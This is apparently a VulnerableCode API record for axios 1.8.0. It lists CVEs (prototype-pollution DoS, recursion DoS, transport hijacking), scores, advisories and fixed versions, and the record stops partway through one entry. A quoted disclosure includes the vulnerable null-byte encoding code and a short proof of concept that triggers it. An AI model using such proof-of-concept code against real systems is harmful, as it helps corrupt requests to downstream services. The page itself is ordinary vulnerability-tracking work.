Django REST framework

Lookup for vulnerable packages by Package URL.

Purl pkg:npm/axios@1.8.0

Type npm

Namespace

Name axios

Version 1.8.0

Qualifiers

Subpath

Is_vulnerable true

Next_non_vulnerable_version 1.16.0

Latest_non_vulnerable_version 1.16.0

Affected_by_vulnerabilities

url VCID-37kj-pzyt-8be6

vulnerability_id VCID-37kj-pzyt-8be6

summary

Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig
The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-25639

reference_id

reference_type

scores

value	0.00044
scoring_system	epss
scoring_elements	0.13954
published_at	2026-06-06T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.1395
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-25639

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/

url

https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57

reference_url

https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/

url

https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e

reference_url

https://github.com/axios/axios/pull/7369

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/

url

https://github.com/axios/axios/pull/7369

reference_url

https://github.com/axios/axios/pull/7388

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/

url

https://github.com/axios/axios/pull/7388

reference_url

https://github.com/axios/axios/releases/tag/v0.30.3

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/

url

https://github.com/axios/axios/releases/tag/v0.30.3

reference_url

https://github.com/axios/axios/releases/tag/v1.13.5

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/

url

https://github.com/axios/axios/releases/tag/v1.13.5

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907
reference_id	1127907
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2438237
reference_id	2438237
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2438237

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-25639

reference_id

CVE-2026-25639

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-25639

reference_url

https://github.com/advisories/GHSA-43fc-jf86-j433

reference_id

GHSA-43fc-jf86-j433

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-43fc-jf86-j433

reference_url

https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433

reference_id

GHSA-43fc-jf86-j433

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/

url

https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433

reference_url	https://access.redhat.com/errata/RHSA-2026:10184
reference_id	RHSA-2026:10184
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:10184

reference_url	https://access.redhat.com/errata/RHSA-2026:11414
reference_id	RHSA-2026:11414
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:11414

reference_url	https://access.redhat.com/errata/RHSA-2026:13542
reference_id	RHSA-2026:13542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13542

reference_url	https://access.redhat.com/errata/RHSA-2026:13548
reference_id	RHSA-2026:13548
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13548

reference_url	https://access.redhat.com/errata/RHSA-2026:19712
reference_id	RHSA-2026:19712
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19712

reference_url	https://access.redhat.com/errata/RHSA-2026:2694
reference_id	RHSA-2026:2694
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:2694

reference_url	https://access.redhat.com/errata/RHSA-2026:3087
reference_id	RHSA-2026:3087
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:3087

reference_url	https://access.redhat.com/errata/RHSA-2026:3105
reference_id	RHSA-2026:3105
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:3105

reference_url	https://access.redhat.com/errata/RHSA-2026:3106
reference_id	RHSA-2026:3106
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:3106

reference_url	https://access.redhat.com/errata/RHSA-2026:3107
reference_id	RHSA-2026:3107
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:3107

reference_url	https://access.redhat.com/errata/RHSA-2026:3109
reference_id	RHSA-2026:3109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:3109

reference_url	https://access.redhat.com/errata/RHSA-2026:4942
reference_id	RHSA-2026:4942
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:4942

reference_url	https://access.redhat.com/errata/RHSA-2026:5142
reference_id	RHSA-2026:5142
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:5142

reference_url	https://access.redhat.com/errata/RHSA-2026:5168
reference_id	RHSA-2026:5168
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:5168

reference_url	https://access.redhat.com/errata/RHSA-2026:5174
reference_id	RHSA-2026:5174
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:5174

reference_url	https://access.redhat.com/errata/RHSA-2026:5633
reference_id	RHSA-2026:5633
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:5633

reference_url	https://access.redhat.com/errata/RHSA-2026:5636
reference_id	RHSA-2026:5636
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:5636

reference_url	https://access.redhat.com/errata/RHSA-2026:5665
reference_id	RHSA-2026:5665
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:5665

reference_url	https://access.redhat.com/errata/RHSA-2026:5807
reference_id	RHSA-2026:5807
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:5807

reference_url	https://access.redhat.com/errata/RHSA-2026:6170
reference_id	RHSA-2026:6170
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6170

reference_url	https://access.redhat.com/errata/RHSA-2026:6174
reference_id	RHSA-2026:6174
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6174

reference_url	https://access.redhat.com/errata/RHSA-2026:6192
reference_id	RHSA-2026:6192
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6192

reference_url	https://access.redhat.com/errata/RHSA-2026:6277
reference_id	RHSA-2026:6277
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6277

reference_url	https://access.redhat.com/errata/RHSA-2026:6308
reference_id	RHSA-2026:6308
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6308

reference_url	https://access.redhat.com/errata/RHSA-2026:6309
reference_id	RHSA-2026:6309
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6309

reference_url	https://access.redhat.com/errata/RHSA-2026:6404
reference_id	RHSA-2026:6404
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6404

reference_url	https://access.redhat.com/errata/RHSA-2026:6428
reference_id	RHSA-2026:6428
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6428

reference_url	https://access.redhat.com/errata/RHSA-2026:6497
reference_id	RHSA-2026:6497
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6497

reference_url	https://access.redhat.com/errata/RHSA-2026:6567
reference_id	RHSA-2026:6567
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6567

reference_url	https://access.redhat.com/errata/RHSA-2026:6568
reference_id	RHSA-2026:6568
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6568

reference_url	https://access.redhat.com/errata/RHSA-2026:6802
reference_id	RHSA-2026:6802
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:6802

reference_url	https://access.redhat.com/errata/RHSA-2026:7249
reference_id	RHSA-2026:7249
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:7249

reference_url	https://access.redhat.com/errata/RHSA-2026:8218
reference_id	RHSA-2026:8218
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8218

reference_url	https://access.redhat.com/errata/RHSA-2026:8229
reference_id	RHSA-2026:8229
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8229

reference_url	https://access.redhat.com/errata/RHSA-2026:8499
reference_id	RHSA-2026:8499
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8499

reference_url	https://access.redhat.com/errata/RHSA-2026:8500
reference_id	RHSA-2026:8500
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8500

reference_url	https://access.redhat.com/errata/RHSA-2026:8501
reference_id	RHSA-2026:8501
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8501

reference_url	https://access.redhat.com/errata/RHSA-2026:9848
reference_id	RHSA-2026:9848
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:9848

fixed_packages

url pkg:npm/axios@1.13.5

purl pkg:npm/axios@1.13.5

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4b7a-22xk-gbh9

vulnerability	VCID-5kg1-k416-dfc1

vulnerability	VCID-6ru1-uamj-5ud3

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-gp41-4j8d-37ce

vulnerability	VCID-hadc-5d2f-gqe6

vulnerability	VCID-jvs6-8bva-nqb3

vulnerability	VCID-kwj2-mk8c-4fef

vulnerability	VCID-rusx-pwdw-zqcj

vulnerability	VCID-td7u-cct6-bud6

vulnerability	VCID-vzqt-dj1z-bqa6

vulnerability	VCID-xdas-dhtb-nuge

vulnerability	VCID-xg1x-4spz-jucn

vulnerability	VCID-yu5y-e4bk-zyfp

vulnerability	VCID-z5pf-pqcd-ckas

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.13.5

aliases CVE-2026-25639, GHSA-43fc-jf86-j433

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-37kj-pzyt-8be6

url VCID-4b7a-22xk-gbh9

vulnerability_id VCID-4b7a-22xk-gbh9

summary axios: Node.js: Axios: Denial of Service via unbounded recursion in toFormData with deeply nested request data

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42039.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42039

reference_id

reference_type

scores

value	0.00031
scoring_system	epss
scoring_elements	0.09393
published_at	2026-06-06T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.09373
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42039

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42039

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:14:11Z/

url

https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42039

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	6.9
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42039

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461630
reference_id	2461630
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461630

reference_url

https://github.com/advisories/GHSA-62hf-57xw-28j9

reference_id

GHSA-62hf-57xw-28j9

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-62hf-57xw-28j9

reference_url	https://access.redhat.com/errata/RHSA-2026:14937
reference_id	RHSA-2026:14937
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14937

reference_url	https://access.redhat.com/errata/RHSA-2026:16476
reference_id	RHSA-2026:16476
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16476

reference_url	https://access.redhat.com/errata/RHSA-2026:16532
reference_id	RHSA-2026:16532
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16532

reference_url	https://access.redhat.com/errata/RHSA-2026:16534
reference_id	RHSA-2026:16534
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16534

reference_url	https://access.redhat.com/errata/RHSA-2026:16535
reference_id	RHSA-2026:16535
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16535

reference_url	https://access.redhat.com/errata/RHSA-2026:16542
reference_id	RHSA-2026:16542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16542

reference_url	https://access.redhat.com/errata/RHSA-2026:16874
reference_id	RHSA-2026:16874
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16874

reference_url	https://access.redhat.com/errata/RHSA-2026:17468
reference_id	RHSA-2026:17468
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17468

reference_url	https://access.redhat.com/errata/RHSA-2026:17474
reference_id	RHSA-2026:17474
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17474

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19109
reference_id	RHSA-2026:19109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19109

reference_url	https://access.redhat.com/errata/RHSA-2026:19375
reference_id	RHSA-2026:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19375

reference_url	https://access.redhat.com/errata/RHSA-2026:20889
reference_id	RHSA-2026:20889
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20889

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:21017
reference_id	RHSA-2026:21017
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21017

reference_url	https://access.redhat.com/errata/RHSA-2026:21338
reference_id	RHSA-2026:21338
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21338

reference_url	https://access.redhat.com/errata/RHSA-2026:21772
reference_id	RHSA-2026:21772
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21772

reference_url	https://access.redhat.com/errata/RHSA-2026:22465
reference_id	RHSA-2026:22465
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22465

reference_url	https://access.redhat.com/errata/RHSA-2026:22619
reference_id	RHSA-2026:22619
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22619

reference_url	https://access.redhat.com/errata/RHSA-2026:22629
reference_id	RHSA-2026:22629
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22629

reference_url	https://access.redhat.com/errata/RHSA-2026:22840
reference_id	RHSA-2026:22840
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22840

reference_url	https://access.redhat.com/errata/RHSA-2026:23361
reference_id	RHSA-2026:23361
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:23361

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42039, GHSA-62hf-57xw-28j9

risk_score 3.4

exploitability 0.5

weighted_severity 6.8

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4b7a-22xk-gbh9

url VCID-5kg1-k416-dfc1

vulnerability_id VCID-5kg1-k416-dfc1

summary

Axios: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams
# Vulnerability Disclosure: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams

## Summary

The `encode()` function in `lib/helpers/AxiosURLSearchParams.js` contains a character mapping (`charMap`) at line 21 that **reverses** the safe percent-encoding of null bytes. After `encodeURIComponent('\x00')` correctly produces the safe sequence `%00`, the charMap entry `'%00': '\x00'` converts it back to a raw null byte.

This is a clear encoding defect: every other charMap entry encodes in the safe direction (literal → percent-encoded), while this single entry decodes in the opposite (dangerous) direction.

**Severity:** Low (CVSS 3.7)
**Affected Versions:** All versions containing this charMap entry
**Vulnerable Component:** `lib/helpers/AxiosURLSearchParams.js:21`

## CWE

- **CWE-626:** Null Byte Interaction Error (Poison Null Byte)
- **CWE-116:** Improper Encoding or Escaping of Output

## CVSS 3.1

**Score: 3.7 (Low)**

Vector: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N`

| Metric | Value | Justification |
|---|---|---|
| Attack Vector | Network | Attacker controls input parameters remotely |
| Attack Complexity | High | Standard axios request flow (`buildURL`) uses its own `encode` function which does NOT have this bug. Only triggered via direct `AxiosURLSearchParams.toString()` without an encoder, or via custom `paramsSerializer` delegation |
| Privileges Required | None | No authentication needed |
| User Interaction | None | No user interaction required |
| Scope | Unchanged | Impact limited to HTTP request URL |
| Confidentiality | None | No confidentiality impact |
| Integrity | Low | Null byte in URL can cause truncation in C-based backends, but requires a vulnerable downstream parser |
| Availability | None | No availability impact |

## Vulnerable Code

**File:** `lib/helpers/AxiosURLSearchParams.js`, lines 13-26

```javascript
function encode(str) {
  const charMap = {
    '!': '%21',     // literal → encoded (SAFE direction)
    "'": '%27',     // literal → encoded (SAFE direction)
    '(': '%28',     // literal → encoded (SAFE direction)
    ')': '%29',     // literal → encoded (SAFE direction)
    '~': '%7E',     // literal → encoded (SAFE direction)
    '%20': '+',     // standard transformation (SAFE)
    '%00': '\x00',  // LINE 21: encoded → raw null byte (UNSAFE direction!)
  };
  return encodeURIComponent(str).replace(/[!'()~]|%20|%00/g, function replacer(match) {
    return charMap[match];
  });
}
```

### Why the Standard Flow Is NOT Affected

```javascript
// buildURL.js:36 — uses its OWN encode function (lines 14-20), not AxiosURLSearchParams's
const _encode = (options && options.encode) || encode;  // buildURL's encode

// buildURL.js:53 — passes buildURL's encode to AxiosURLSearchParams
new AxiosURLSearchParams(params, _options).toString(_encode);  // external encoder used

// AxiosURLSearchParams.js:48 — when encoder is provided, internal encode is NOT used
const _encode = encoder ? function(value) { return encoder.call(this, value, encode); } : encode;
//                                                                              ^^^^^^
//                                           internal encode passed as 2nd arg but only used if
//                                           the external encoder explicitly delegates to it
```

## Proof of Concept

```javascript
import AxiosURLSearchParams from './lib/helpers/AxiosURLSearchParams.js';
import buildURL from './lib/helpers/buildURL.js';

// Test 1: Direct AxiosURLSearchParams (VULNERABLE path)
const params = new AxiosURLSearchParams({ file: 'test\x00.txt' });
const result = params.toString();  // NO encoder → uses internal encode with charMap
console.log('Direct toString():', JSON.stringify(result));
// Output: "file=test\u0000.txt" (contains raw null byte)
console.log('Hex:', Buffer.from(result).toString('hex'));
// Output: 66696c653d74657374002e747874  (00 = null byte)

// Test 2: Via buildURL (NOT vulnerable — standard axios flow)
const url = buildURL('http://example.com/api', { file: 'test\x00.txt' });
console.log('Via buildURL:', url);
// Output: http://example.com/api?file=test%00.txt  (%00 preserved safely)
```

## Verified PoC Output

```
Direct toString(): "file=test\u0000.txt"
Contains raw null byte: true
Hex: 66696c653d74657374002e747874

Via buildURL: http://example.com/api?file=test%00.txt
Contains raw null byte: false
Contains safe %00: true
```

## Impact Analysis

**Primary impact is limited** because the standard axios request flow is not affected. However:

- **Direct API users:** Applications using `AxiosURLSearchParams` directly for custom serialization are affected
- **Custom paramsSerializer:** A `paramsSerializer.encode` that delegates to the internal encoder triggers the bug
- **Code defect signal:** The directional inconsistency in charMap is a clear coding error with no legitimate use case

If null bytes reach a downstream C-based parser, impacts include URL truncation, WAF bypass, and log injection.

## Recommended Fix

Remove the `%00` entry from charMap and update the regex:

```javascript
function encode(str) {
  const charMap = {
    '!': '%21',
    "'": '%27',
    '(': '%28',
    ')': '%29',
    '~': '%7E',
    '%20': '+',
    // REMOVED: '%00': '\x00'
  };
  return encodeURIComponent(str).replace(/[!'()~]|%20/g, function replacer(match) {
    //                                           ^^^^ removed |%00
    return charMap[match];
  });
}
```

## Resources

- [CWE-626: Null Byte Interaction Error](https://cwe.mitre.org/data/definitions/626.html)
- [CWE-116: Improper Encoding or Escaping of Output](https://cwe.mitre.org/data/definitions/116.html)
- [OWASP: Embedding Null Code](https://owasp.org/www-community/attacks/Embedding_Null_Code)
- [Axios GitHub Repository](https://github.com/axios/axios)

## Timeline

| Date | Event |
|---|---|
| 2026-04-15 | Vulnerability discovered during source code audit |
| 2026-04-16 | Report revised: documented standard-flow limitation, corrected CVSS |
| TBD | Report submitted to vendor via GitHub Security Advisory |

references

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42040

reference_id

reference_type

scores

value	0.00083
scoring_system	epss
scoring_elements	0.24281
published_at	2026-06-06T12:55:00Z

value	0.00083
scoring_system	epss
scoring_elements	0.24299
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42040

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42040

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	3.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw

reference_id

reference_type

scores

value	3.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

value	LOW
scoring_system	cvssv3.1_qr
scoring_elements

value	LOW
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:48:02Z/

url

https://github.com/axios/axios/security/advisories/GHSA-xhjh-pmcv-23jw

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42040

reference_id

reference_type

scores

value	3.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

value	LOW
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42040

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url

https://github.com/advisories/GHSA-xhjh-pmcv-23jw

reference_id

GHSA-xhjh-pmcv-23jw

reference_type

scores

value	LOW
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-xhjh-pmcv-23jw

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42040, GHSA-xhjh-pmcv-23jw

risk_score 1.6

exploitability 0.5

weighted_severity 3.3

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5kg1-k416-dfc1

url VCID-6ru1-uamj-5ud3

vulnerability_id VCID-6ru1-uamj-5ud3

summary axios: Axios: HTTP Transport Hijacking via Prototype Pollution

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42033

reference_id

reference_type

scores

value	0.00059
scoring_system	epss
scoring_elements	0.18708
published_at	2026-06-05T12:55:00Z

value	0.00059
scoring_system	epss
scoring_elements	0.18711
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42033

